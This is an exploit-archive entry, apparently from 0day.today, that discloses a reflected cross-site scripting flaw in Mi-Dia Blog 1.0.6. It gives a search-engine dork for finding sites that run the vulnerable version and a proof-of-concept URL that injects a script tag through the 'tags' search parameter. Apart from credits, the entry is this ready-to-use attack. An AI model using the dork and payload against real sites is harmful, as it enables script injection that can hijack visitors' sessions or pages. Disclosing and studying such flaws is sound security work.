id: 11592
date: 04/03/2010
title: Mi-Dia Blog 1.0.6 XSS Vulnerability
author: Itsecteam
cves: 

===================================
Mi-Dia Blog 1.0.6 XSS Vulnerability
===================================

##############################################################################
#Title:             Mi-Dia Blog 1.0.6 XSS                                    #
#Vendor:            http://www.mi-dia.co.uk                                  #
#Dork:              "Powered by Mi-Dia Blog v1.0.6"                          #
##############################################################################
#AUTHOR:            ITSecTeam                                                #
#Email:             Bug@ITSecTeam.com                                        #
#Website:           http://www.itsecteam.com                                 #
#Forum :            http://forum.ITSecTeam.com                               #
#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability33.htm #
#Thanks:            r3dm0v3, Pejvak, am!rkh@n & everyone in the world :D     #
##############################################################################


#POC:#########################################################################
http://site.com/?s=search&tags=<script>alert(1)</script>



#  0day.today [2023-03-25]  #